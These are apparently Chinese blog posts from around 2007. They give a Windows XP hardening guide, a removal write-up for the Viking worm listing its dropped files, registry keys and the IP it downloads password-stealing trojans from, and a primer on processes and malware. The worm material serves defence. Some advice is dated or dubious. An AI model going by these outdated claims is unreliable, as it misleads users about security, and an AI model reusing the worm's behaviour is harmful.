若PC没有特殊用途,基于安全考虑,打开控制面板,进入管理工具——服务,关闭以下服务:


1.Alerter[通知选定的用户和计算机管理警报]

2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]

3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享

4.Distributed Link Tracking Server[适用局域网分布式链接]

5.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]

6.Messenger[警报]

7.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]

8.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]

9.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]

10.Remote Desktop Help Session Manager[管理并控制远程协助]

11.Remote Registry[使远程计算机用户修改本地注册表]

12.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]

13.Server[支持此计算机通过网络的文件、打印、和命名管道共享]

14.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持而使用户能够共享文件、打印和登录到网络]

15.Telnet[允许远程用户登录到此计算机并运行程序]

16.Terminal Services[允许用户以交互方式连接到远程计算机]

17.Window s Image Acquisition (WIA)[照相服务,应用与数码摄象机]


如果发现机器开启了一些很奇怪的服务,如r_server这样的服务,必须马上停止该服务,因为这完全有可能是黑客使用控制程序的服务端。


10、账号密码的安全原则


首先禁用guest帐号,将系统内建的administrator帐号改名~~(改的越复杂越好,最好改成中文的),然后设置一个密码,最好是8位以上字母数字符号组合。 (让那些该死的黑客慢慢猜去吧~)


如果你使用的是其他帐号,最好不要将其加进administrators,如果加入administrators组,一定也要设置一个足够安全的密码,同上如果你设置adminstrator的密码时,最好在安全模式下设置,因为经我研究发现,在系统中拥有最高权限的帐号,不是正常登陆下的adminitrator帐号,因为即使有了这个帐号,同样可以登陆安全模式,将sam文件删除,从而更改系统的administrator的密码!而在安全模式下设置的administrator则不会出现这种情况,因为不知道这个administrator密码是无法进入安全模式。权限达到最大这个是密码策略:用户可以根据自己的习惯设置密码,下面是我建议的设置(关于密码安全设置,我上面已经讲了,这里不再罗嗦了。

  

打开管理工具.本地安全设置.密码策略


1.密码必须符合复杂要求性.启用

2.密码最小值.我设置的是8

3.密码最长使用期限.我是默认设置42天

4.密码最短使用期限0天

5.强制密码历史 记住0个密码

6.用可还原的_blank/>加密来存储密码 禁用

  

11、本地策略:


这个很重要,可以帮助我们发现那些心存叵测的人的一举一动,还可以帮助我们将来追查黑客。


(虽然一般黑客都会在走时会清除他在你电脑中留下的痕迹,不过也有一些不小心的)


打开管理工具

  

找到本地安全设置.本地策略.审核策略


1.审核策略更改 成功失败

2.审核登陆事件 成功失败

3.审核对象访问 失败

4.审核跟踪过程 无审核

5.审核目录服务访问 失败

6.审核特权使用 失败

7.审核系统事件 成功失败

8.审核帐户登陆时间 成功失败

9.审核帐户管理 成功失败

&nb sp;然后再到管理工具找到

事件查看器

应用程序:右键/>属性/>设置日志大小上限,我设置了50mb,选择不覆盖事件

安全性:右键/>属性/>设置日志大小上限,我也是设置了50mb,选择不覆盖事件

系统:右键/>属性/>设置日志大小上限,我都是设置了50mb,选择不覆盖事件

12、本地安全策略:


打开管理工具

  

找到本地安全设置.本地策略.安全选项

    

1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,? 但是我个人是不需要直接输入密码登陆的]

2.网络访问.不允许SAM帐户的匿名枚举 启用

3.网络访问.可匿名的共享 将后面的值删除

4.网络访问.可匿名的命名管道 将后面的值删除

5.网络访问.可远程访问的注册表路径 将后面的值删除

6.网络访问.可远程访问的注册表的子路径 将后面的值删除

7.网络访问.限制匿名访问命名管道和共享

8.帐户.(前面已经详细讲过拉 )


13、用户权限分配策略:


打开管理工具

  

找到本地安全设置.本地策略.用户权限分配

    

1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID

2.从远程系统强制关机,Admin帐户也删除,一个都不留    

3.拒绝从网络访问这台计算机 将ID删除

4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务

5.通过远端强制关机。删掉


14、终端服务配置


打开管理工具

  

终端服务配置


1.打开后,点连接,右键,属性,远程控制,点不允许远程控制

2.常规,加密级别,高,在使用标准Windows验证上点√!

3.网卡,将最多连接数上设置为0

4.高级,将里面的权限也删除.[我没设置]

再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话


15、用户和组策略


打开管理工具


计算机管理.本地用户和组.用户;


删除Support_388945a0用户等等


只留下你更改好名字的adminisrator权限  


计算机管理.本地用户和组.组

    

组.我们就不分组了,每必要把


16、自己动手DIY在本地策略的安全选项

    

1)当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.

2)登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.

3)对匿名连接的额外限制

4)禁止按 alt+crtl +del(没必要)

5)允许在未登陆前关机[防止远程关机/启动、强制关机/启动]

6)只有本地登陆用户才能访问cd-rom

7)只有本地登陆用户才能访问软驱

8)取消关机原因的提示


A、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;

B、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;

C、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;

D、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。


9)禁止关机事件跟踪

开始“Start -/>”运行“ Run -/>输入”gpedit.msc “,在出现的窗口的左边部分,选择 ”计算机配置“(Computer Configuration )-/> ”管理模板“(Administrative Templates)-/> ”系统“(System),在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),点击然后“确定”(OK)保存后退出这样,你将看到类似于Windows 2000的关机窗口


17、常见端口的介绍

            

  TCP

  21   FTP

  22   SSH

  23   TELNET

  25   TCP SMTP

  53   TCP DNS

  80   HTTP

  135  epmap

  138  [冲击波]

  139  smb

  445

  1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b

  1026 DCE/12345778-1234-abcd-ef00-0123456789ac

  1433 TCP SQL SERVER

  5631 TCP PCANYWhere

  5632 UDP PCANYWhere

  3389   Terminal Services

  4444[冲击波]

 

  UDP

  67[冲击波]

  137 netbios-ns

  161 An SNMP Agent is running/ Default community names of the SNMP Agent


关于UDP一般只有腾讯QQ会打开4000或者是8000端口或者8080,那么,我们只运 行本机使用4000这几个端口就行了

18、另外介绍一下如何查看本机打开的端口和tcp\ip端口的过滤


开始--运行--cmd


输入命令netstat -a


会看到例如(这是我的机器开放的端口)


Proto Local Address    Foreign Address    State

TCP  yf001:epmap yf001:0     LISTE

TCP  yf001:1025 yf001:0 LISTE

TCP  (用户名):1035  yf001:0 LISTE

TCP  yf001:netbios-ssn yf001:0       LISTE

UDP  yf001:1129      *:*

UDP  yf001:1183      *:*

UDP  yf001:1396      *:*

UDP  yf001:1464      *:*

UDP  yf001:1466      *:*

UDP  yf001:4000      *:*

UDP  yf001:4002      *:*

UDP  yf001:6000      *:*

UDP  yf001:6001      *:*

UDP  yf001:6002      *:*

UDP  yf001:6003      *:*

UDP  yf001:6004      *:*

UDP  yf001:6005      *:*

UDP  yf001:6006      *:*

UDP  yf001:6007      *:*

UDP  yf001:1030      *:*

UDP  yf001:1048      *:*

UDP  yf001:1144      *:*

UDP  yf001:1226      *:*

UDP  yf001:1390      *:*

UDP  yf001:netbios-ns *:*

UDP  yf001:netbios-dgm *:*

UDP  yf001:isakmp *:*


现在讲讲基于Windows的tcp/ip的过滤


控制面板——网络和拨号连接——本地连接——INTERNET协议(tcp/ip)--属性--高级---选项-tcp/ip筛选--属性!!


然后添加需要的tcp 和UDP端口就可以了~如果对端口不是很了解的话,不要轻易进行过滤,不然可能会导致一些程序无法使用。


19、关于浏览器


IE浏览器(或基于IE内核的浏览器)存在隐私问题,index.dat文件里记录着你上网的信息。所以我推荐大家换一款其他内核浏览器。

现在炒的很热的FireFox,就很不错,如果你想打造一款属于自己的个性化浏览器,那FireFox是首选。它有强大的扩展定制功能!

还有传说中那款最快的浏览器 Opera ,速度惊人,界面华丽,笔者正在使用。(就在3个小时前,OPERA公司10年庆祝送正式注册码,笔者申请了两个,^_^)


当然,由于国内一些网页并不是用WC3组织认证的标准HTML语言编写,所以IE还是不能丢,留作备用。


处理IE隐私可以用:Webroot WindowWasher -- www.hanzify.org 上有正式版+汉化补丁

Ccleaner -- GOOGLE一下,官方占上有,多国语言的。

RAMDISK 用内存虚拟出一块硬盘,将缓存文件写进去,不仅解决了隐私问题,理论上还能提高网速。(建议内存/>=512M者使用)


20、最后一招,也是最关键的一招:安装杀软与防火墙

  

杀毒软件要看实力,绝对不能看广告。笔者在霏凡的病毒区混了半年,把杀软几乎也装了个遍,以下是个人心得:


1:国产杀软:江民一出,谁与争峰?KV的败笔就是当年那个硬盘炸弹吧,呵呵。其实论实力,江民在国内绝对是一支独秀。先进的杀毒引擎,较完整的病毒库,

清除活体病毒能力强,杀壳能力强,可杀连环DLL,监控灵敏,占系统内存小。--声明:我不是KV的枪手,因为国内的杀软公司普遍只会打广告,应该BS一下。

DB2005都到了2005了才杀两个壳?Rising的误报天下第一,可是随便下个毒包基本上没有它报的(不信的去霏凡病毒区试试:bbs.crsky.com);费尔还不错,

可是与KV比还有差距;光华虽然是主动升级,但毒库也不是很全。


2:国外杀软:百家争鸣!

Kapersky:这款俄国的杀软在国内极度火热,其拥有世界第一的毒库,毒库3小时一升级,对系统提供最完善的保护。

McAfee:美国杀软,柔和而强劲的保护,适合有点资历的用户。规则指定得当,百毒不侵。

Norton: 唉!老了老了,对国内木马简直是白痴。本不想说它,可是又是国际三大杀软之一,唉!

NOD32:占资源超小,杀毒超快,监控灵敏,只是毒库似乎有些不全。

BitDefender:罗马尼亚不错的杀软,能力平衡。

GData AntiVirusKit:真正的强悍!它用Kapersky+BitDefender的双引擎,而且经优化处理,系统不会很卡。

F-Scure:竟然夸张到4引擎!不过除了Kapersky4.0的引擎,其他的很一般。虽然保护是很周到,但用它笔者觉得不如AVK(上一个)。


笔者建议:一般配置 KV2005 or McAfee or Kapersky or GData AntiVirusKit;-配置稍好的可以用以上任一款(除KV2005)+ KV2004

老爷机配置 KV2004 or NOD32

较好的机器 GData AntiVirusKit+KV2005 or Kapersky+KV2005 or McAfee+KV2005


防火墙,系统的最后一道防线。即使杀软再强大,一些最新变种的木马仍能见缝插针。没有防火墙,你的机器很可能成为Haker的代理服务器,呵呵。还有,如果你的

系统有漏洞,Haker也会轻而易举的Contral Your PC.

强大的防火墙推荐:Look 'n' Stop :世界测评第一。占内存超小。启动超迅速。

ZoneAlarm :性力强大,功能很多,全面且稳定。

Tiny :这是一款专业到恐怖的防火墙,能力绝对强悍!适合较专业者使用。

天网:国内最强的了,只是和国外的比......


说一句,木马专杀的东西几乎没用,因为那些根本没有什么先进的引擎。如果一定要,就用ewido吧,这个还可以。

推荐日志 Worm.Win32.Viking.p威金变种的查杀

[ 2007-03-25 03:48:47 | 作者: sun ]
常常碰到名为“_desktop.ini”的一个隐藏文件。经查是一种叫做威金的蠕虫病毒。它的症状是感染10MB以下的可执行程序,表现为改变程序的图标,并且导致可执行程序不能被执行。计算机反应变慢,断网等现象。通过网上下载的专杀工具试图驱逐无果,删是删不掉的,它从你的计算机的最后一个盘向上不停的复制。似乎只有通从新分区后再做重做系统才会彻底。但是这样,就丢了计算机上很多宝贵的东东。
这几天被病毒害苦了,到处都是_desktop.ini
  
网上搜了一下。。基本搞定, 下面这个方法不错。
批量删除_desktop.ini的命令
现在使用DOS命令批量删除_desktop.ini,如下:
  del d:\_desktop.ini /f/s/q/a
  强制删除d盘下所有目录内(包括d盘本身)的_desktop.ini文件并且不提示是否删除
  /f 强制删除只读文件
  /q 指定静音状态。不提示您确认删除。
  /s 从当前目录及其所有子目录中删除指定文件。显示正在被删除的文件名。
  /a的意思是按照属性来删除了
  这个命令的作用是在杀掉viking病毒之后清理系统内残留的_desktop.ini文件用的

手动清除方案:

1、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 使用“进程管理”关闭病毒进程
(2) 删除病毒文件
%WINDDIR%\rundl132.exe
%Program Files%\_desktop.ini
桌面\viDll.dll
系统根目录\_desktop.ini
系统根目录\1.txt
系统根目录\MH_FILE\MH_DLL.dll
系统根目录\TODAYZTKING\TODAYZTKING.dll
会在大量文件夹中释放文件_desktop.ini
%WINDDIR%\0sy.exe
%WINDDIR%\1sy.exe
%WINDDIR%\2sy.exe
(3) 恢复病毒修改的注册表项目,删除病毒添加的注册表项
HKEY_CURRENT_USER\Software\Microsoft\Windows NT
\CurrentVersion\Windows
键值: 字串: "load "="C:\WINDOWS\rundl132.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
键值: 字串: "ver_down0"="0.859: Source:C:\WINDOWS\system32\_0000012_.tmp.dll (3.0.3790.218001111)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
键值: 字串: " ver_down1"="0.687: 2006/06/13 20:52:04.23s444 (local)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
键值: 字串: " ver_down2"="0.859: Source:C:\WINDOWS\system32\_000006_.tmp.dll
(3.0.3790.21801)"
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\auto
键值: 字串: "1"

下面是病毒的详细资料:
病毒名称: Worm.Win32.Viking.p
病毒类型: 蠕虫
文件 MD5: E939658C090087B08A1CD498F2DB59B3
公开范围: 完全公开
危害等级: 中
文件长度: 1,025,308 字节
感染系统: windows98以上版本
开发工具: Borland Delphi V3.0
加壳类型: Upack 2.4 - 2.9 beta
命名对照: Symentec[W32.Looked.P]
      Mcafee[无]
该病毒属蠕虫类,病毒运行后释放病毒文件%WINDDIR%\rundl132.exe、系统盘根目录\_desktop.ini、%Program Files%\_desktop.ini、桌面\viDll.dll,会在大量文件夹中释放文件_desktop.ini;连接网络,开启端口,下载病毒文件%WINDDIR%\0sy.exe、%WINDDIR%\1sy.exe、%WINDDIR%\2sy.exe;开启进程conime.exe及其自身,注入到进程explorer.exe中,修改注册表,添加启动项,以达到随机启动的目的;感染大部分非系统文件;病毒把自身加入到要感染的程序,在被感染的程序运行时,病毒也同时运行,但在运行一次后自动释放病毒体,被感染文件也恢复正常,隔段时间后病毒会再次感染此应用程序;病毒尝试终止相关杀病毒软件;病毒主要通过共享目录、文件捆绑、运行被感染病毒的程序、可带病毒的邮件附件等方式进行传播。

1、病毒运行后释放病毒文件:
%WINDDIR%\rundl132.exe
%Program Files%\_desktop.ini
桌面\viDll.dll
系统根目录\_desktop.ini
系统根目录\1.txt
系统根目录\MH_FILE\MH_DLL.dll
系统根目录\TODAYZTKING\TODAYZTKING.dll
会在大量文件夹中释放文件_desktop.ini

2、连接网络,开启端口,下载病毒文件:
协议:TCP
IP:61.152.116.22
本地端口:随机开启本地1024以上端口,如:1156
下载病毒文件:
路径名:
%WINDDIR%\0sy.exe
%WINDDIR%\1sy.exe
%WINDDIR%\2sy.exe
病毒名:
Trojan-PSW.Win32.WOW.ek
Trojan-PSW.Win32.WOW.fq
Trojan-PSW.Win32.WOW.fs

3、开启进程conime.exe及其自身,注入到进程explorer.exe中。

4、修改注册表,添加启动项,以达到随机启动的目的:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
键值: 字串: "load "="C:\WINDOWS\rundl132.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
键值: 字串: "ver_down0"="0.859: Source:C:\WINDOWS\system32\_0000012_.tmp.dll (3.0.3790.218001111)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
键值: 字串: " ver_down1"="0.687: 2006/06/13 20:52:04.23s444 (local)"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
键值: 字串: " ver_down2"="0.859: Source:C:\WINDOWS\system32\_000006_.tmp.dll (3.0.3790.21801)"
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\auto
键值: 字串: "1"

5、感染大部分非系统文件,不感染下列文件夹中的文件:
system
system32
Documents and Settings
System Volume Information
Recycled
windor
Windows NT
WindowsUpdate
Windows Media Player
Internet Explorer
ComPlus Applications
NetMeeting
Common Files
Messenger
Microsoft Office
InstallShield Installation Information

6、病毒尝试终止相关杀病毒软件。

7、病毒把自己身加入到要感染的程序,在被感染的程序运行时,病毒也同时运行,但在运行一次后自动释放病毒体,被感染文件也恢复正常,隔段时间后病毒会再次感染此应用程序。

8、病毒主要通过共享目录、文件捆绑、运行被感染病毒的程序、可带病毒的邮件附件等方式进行传播。
注:% System%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。

推荐日志 十七点安全知识详细了解进程和病毒

[ 2007-03-25 03:48:35 | 作者: sun ]

第一:进程是什么

进程为应用程序的运行实例,是应用程序的一次动态执行。看似高深,我们可以简单地理解为:它是操作系统当前运行的执行程序。在系统当前运行的执行程序里包括:系统管理计算机个体和完成各种操作所必需的程序;用户开启、执行的额外程序,当然也包括用户不知道,而自动运行的非法程序(它们就有可能是病毒程序)。

危害较大的可执行病毒同样以“进程”形式出现在系统内部(一些病毒可能并不被进程列表显示,如“宏病毒”),那么及时查看并准确杀掉非法进程对于手工杀毒有起着关键性的作用。

第二:什么是木马

木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名,顾名思义就是一种伪装潜伏的网络病毒,等待时机成熟就出来害人。

传染方式:通过电子邮件附件发出,捆绑在其他的程序中。

病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。

木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序,一旦发作,就可设置后门,定时地发送该用户的隐私到木马程序指定的地址,一般同时内置可进入该用户电脑的端口,并可任意控制此计算机,进行文件删除、拷贝、改密码等非法操作。

防范措施:用户提高警惕,不下载和运行来历不明的程序,对于不明来历的邮件附件也不要随意打开。

第三:什么是计算机病毒

计算机病毒是一个程序,一段可执行码。就像生物病毒一样,计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。

除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图象上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散,能“传染” 其他程序的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为制造的程序,它通过不同的途径潜伏或寄生在存储媒体(如磁盘、内存)或程序里。当某种条件或时机成熟时,它会自生复制并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒所相似之处是能够侵入计算机系统和网络,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复制, 具有传染性。

所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质(或程序)里, 当达到某种条件时即被激活的具有对计算机资源进行破坏作用的一组程序或指令集合。

第四:什么是蠕虫病毒

蠕虫病毒是计算机病毒的一种。它的传染机理是利用网络进行复制和传播,传染途径是通过网络和电子邮件。

比如近几年危害很大的“尼姆达”病毒就是蠕虫病毒的一种。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。

蠕虫病毒的一般防治方法是:使用具有实时监控功能的杀毒软件,并且注意不要轻易打开不熟悉的邮件附件。

第五:什么是广告软件Adware

广告软件(Adware)是指 未经用户允许,下载并安装或与其他软件捆绑通过弹出式广告或以其他形式进行商业广告宣传的程序。安装广告软件之后,往往造成系统运行缓慢或系统异常。

防治广告软件,应注意以下方面:

1、不要轻易安装共享软件或“免费软件”,这些软件里往往含有广告程序、间谍软件等不良软件,可能带来安全风险。


2、有些广告软件通过恶意网站安装,所以,不要浏览不良网站。

3、采用安全性比较好的网络浏览器,并注意弥补系统漏洞。

第六:什么是间谍软件Spyware

间谍软件(Spyware)是能够在使用者不知情的情况下,在用户电脑上安装后门程序的软件。 用户的隐私数据和重要信息会被那些后门程序捕获, 甚至这些 “后门程序” 还能使黑客远程操纵用户的电脑。

防治间谍软件,应注意以下方面:

1、不要轻易安装共享软件或“免费软件”,这些软件里往往含有广告程序、间谍软件等不良软件,可能带来安全风险。

2、有些间谍软件通过恶意网站安装,所以,不要浏览不良网站。

3、采用安全性比较好的网络浏览器,并注意弥补系统漏洞。

第七:Dll文件是什么

DLL是Dynamic Link Library的缩写,意为动态链接库。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。一个应用程序可有多个DLL文件,一个DLL文件也可能被几个应用程序所共用,这样的DLL文件被称为共享DLL文件。DLL文件一般被存放在C:\WindowsSystem目录下。

1、如何了解某应用程序使用哪些DLL文件

右键单击该应用程序并选择快捷菜单中的“快速查看”命令,在随后出现的“快速查看”窗口的“引入表”一栏中你将看到其使用DLL文件的情况。

2、如何知道DLL文件被几个程序使用

运行Regedit,进入HKEY_LOCAL_MACHINESoftwareMicrosrftWindowsCurrent-

ersionSharedDlls子键查看,其右边窗口中就显示了所有DLL文件及其相关数据,其中数据右边小括号内的数字就说明了被几个程序使用,(2)表示被两个程序使用,(0)则表示无程序使用,可以将其删除。

3、如何解决DLL文件丢失的情况

有时在卸载文件时会提醒你删除某个DLL文件可能会影响其他应用程序的运行。所以当你卸载软件时,就有可能误删共享的DLL文件。一旦出现了丢失DLL文件的情况,如果你能确定其名称,可以在Sysbckup(系统备份文件夹)中找到该DLL文件,将其复制到System文件夹中。如果这样不行,在电脑启动时又总是出现“***dll文件丢失……”的提示框,你可以在“开始/运行”中运行Msconfig,进入系统配置实用程序对话框以后,单击选择“System.ini”标签,找出提示丢失的DLL文件,使其不被选中,这样开机时就不会出现错误提示了。

rundll的功能是以命令列的方式呼叫Windows的动态链结库。

Rundll32.exe与Rundll.exe的区别就在于前者是呼叫32位的链结库,后者是用于16位的链结库。rundll32.exe是专门用来调用dll文件的程序。

如果用的是Win98,rundll32.exe一般存在于Windows目录下;

如果用的WinXP,rundll32.exe一般存在于WindowsSystem32目录下。

若是在其它目录,就可能是一个木马程序,它会伪装成rundll32.exe。

第八:什么是系统进程

进程是指在系统中正在运行的一个应用程序;线程是系统分配处理器时间资源的基本单元,或者说进程之内独立执行的一个单元。对于操 作系统而言,其调度单元是线程。一个进程至少包括一个线程,通常将该线程称为主线程。一个进程从主线程的执行开始进而创建一个或多个附加线程,就是所谓基于多线程的多任务。

那进程与线程的区别到底是什么?进程是执行程序的实例。例如,当你运行记事本程序(Nodepad)时,你就创建了一个用来容纳组成Notepad.exe的代码及其所需调用动态链接库的进程。每个进程均运行在其专用且受保护的地址空间内。因此,如果你同时运行记事本的两个拷贝,该程序正在使用的数据在各自实例中是彼此独立的。在记事本的一个拷贝中将无法看到该程序的第二个实例打开的数据。

以沙箱为例进行阐述。一个进程就好比一个沙箱。线程就如同沙箱中的孩子们。孩子们在沙箱子中跑来跑去,并且可能将沙子攘到别的孩子眼中,他们会互相踢打或撕咬。但是,这些沙箱略有不同之处就在于每个沙箱完全由墙壁和顶棚封闭起来,无论箱中的孩子如何狠命地攘沙,他们也不会影响到其它沙箱中的其他孩子。因此,每个进程就象一个被保护起来的沙箱。未经许可,无人可以进出。


实际上线程运行而进程不运行。两个进程彼此获得专用数据或内存的唯一途径就是通过协议来共享内存块。这是一种协作策略。下面让我们分析一下任务管理器里的进程选项卡。

这里的进程是指一系列进程,这些进程是由它们所运行的可执行程序实例来识别的,这就是进程选项卡中的第一列给出了映射名称的原因。请注意,这里并没有进程名称列。进程并不拥有独立于其所归属实例的映射名称。换言之,如果你运行5个记事本拷贝,你将会看到5个称为Notepad.exe的进程。它们是如何彼此区别的呢?其中一种方式是通过它们的进程ID,因为每个进程都拥有其独一无二的编码。该进程ID由Windows NT或Windows 2000生成,并可以循环使用。因此,进程ID将不会越编越大,它们能够得到循环利用。

第三列是被进程中的线程所占用的CPU时间百分比。它不是CPU的编号,而是被进程占用的CPU时间百分比。此时我的系统基本上是空闲的。尽管系统看上去每一秒左右都只使用一小部分CPU时间,但该系统空闲进程仍旧耗用了大约99%的CPU时间。

第四列,CPU时间,是CPU被进程中的线程累计占用的小时、分钟及秒数。请注意,我对进程中的线程使用占用一词。这并不一定意味着那就是进程已耗用的CPU时间总和,因为,如我们一会儿将看到的,NT计时的方式是,当特定的时钟间隔激发时,无论谁恰巧处于当前的线程中,它都将计算到CPU周期之内。通常情况下,在大多数NT系统中,时钟以10毫秒的间隔运行。每10毫秒NT的心脏就跳动一下。有一些驱动程序代码片段运行并显示谁是当前的线程。让我们将CPU时间的最后10毫秒记在它的帐上。因此,如果一个线程开始运行,并在持续运行8毫秒后完成,接着,第二个线程开始运行并持续了2毫秒,这时,时钟激发,请猜一猜这整整10毫秒的时钟周期到底记在了哪个线程的帐上?答案是第二个线程。因此,NT中存在一些固有的不准确性,而NT恰是以这种方式进行计时,实际情况也如是,大多数32位操作系统中都存在一个基于间隔的计时机制。请记住这一点,因为,有时当你观察线程所耗用的CPU总和时,会出现尽管该线程或许看上去已运行过数十万次,但其CPU时间占用量却可能是零或非常短暂的现象,那么,上述解释便是原因所在。上述也就是我们在任务管理器的进程选项卡中所能看到的基本信息列。

第九:什么是应用程序

应用程序指的是程序开发人员要开发的一个数据库应用管理系统,它可以是一个单位的财务管理系统、人事管理系统等。(各种有关功能的窗口的集合构成一个完整的应用系统,分发给各个终端用户的就是一个应用程序。

第十:如何察看正在运行的进程

察看正在运行的进程的方法有很多,最简单就是使用Windows自带的进程管理器察看正在运行的进程:同时按下“Ctl Alt Del”打开Windows进程管理器。点击进程的标签,即可察看系统中进行的进程列表。或者用鼠标右键点系统状态栏“系统管理器”进入系统进程管理器。

第十一:如何强制结束一个运行中的进程

1、打开“终端服务管理器(任务管理器)”。

2、在“进程”选项卡上的“用户”列下,右键单击要结束的进程,然后单击“结束进程”。

注意:

(1)必须具有完全控制权限才能结束进程。

(2)要打开“终端服务管理器”,请依次单击“开始”和“控制面板”,双击“管理工具”,然后双击“终端服务管理器”。

(3)请注意:在没有警告的情况下结束进程会导致用户会话中的数据丢失。

(4)可能需要结束进程,因为应用程序没有响应

(5)也可以使用 tskill 命令结束进程。

强制结束进程的命令行

Windows操作系统中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,最后那个是Win32子系统,ntsd本身需要它。ntsd从2000开始就是系统自带的用户态调试工具。被调试器附着(attach)的进程会随调试器一起退出,所以可以用来在命令行下终止进程。使用ntsd自动就获得了debug权限,从而能杀掉大部分的进程。ntsd会新开一个调试窗口,本来在纯命令行下无法控制,但如果只是简单的命令,比如退出(q),用-c参数从命令行传递就行了。Ntsd按照惯例也向软件开发人员提供。只有系统开发人员使用此命令。有关详细信息,请参阅 NTSD 中所附的帮助文件。用法:开个cmd.exe窗口,输入:

ntsd -c q -p PID



把最后那个PID,改成你要终止的进程的ID。如果你不知道进程的ID,任务管理器->进程选项卡->查看->选择列->勾上“PID(进程标识符)”,然后就能看见了。

XP下还有两个好用的工具tasklist和tskill。tasklist能列出所有的进程,和相应的信息。tskill能查杀进程,语法很简单:tskill 程序名!

结束进程的一些巧用小窍门

误删VCD文件的另类恢复

现在很多人会把一些不错的VCD直接拷入硬盘保存。但你是否误删过这些百看不厌的经典之作呢?那么怎样才能在不用恢复软件的情况下手动恢复它们呢?

笔者找到了一个另类的恢复方法,并且效果还不错。首先要知道误删的VCD文件的文件名和原文件存储路径。一般情况下VCD的主要视频文件是VCD根目录下的Mpegav文件夹,文件名一般为Avseq0?.dat或Music0?.dat,其中“?”代表数字(1~9)。有的VCD序幕和正式内容是一个文件,即Avseq01.dat或Music01.dat;也有的VCD序幕和正式内容分别为两个文件,即序幕为Avseq01.dat或Music01.dat,而正式内容为Avseq02.dat或Music02.dat。

首先,找一个和误删文件同名的文件(暂且称为A),接着将A复制到原误删文件的同一文件夹中。在出现“正在复制...”窗口时,按下Ctrl+Alt+Del结束“正在复制...”任务,如果“正在复制...”窗口不消失,就再次按下Ctrl+Alt+Del结束“正在复制...”任务。就这么简单,到原误删文件存储的地方看一下,是不是又失而复得了?用多媒体播放软件打开,只是开头几秒种是文件A的内容,后面的照看不误。

保存拷了一部分的文件

如果你经常会把MP3、CD、VCD、MPEG、RM等音、视频文件(或其他类型的文件)从光盘中复制到硬盘,那么可能会遇到复制到只剩下一点点时,Windows提示“复制文件出错”,这时只要按回车键或点击“确定”按钮,那么辛辛苦苦复制的文件就会丢失。

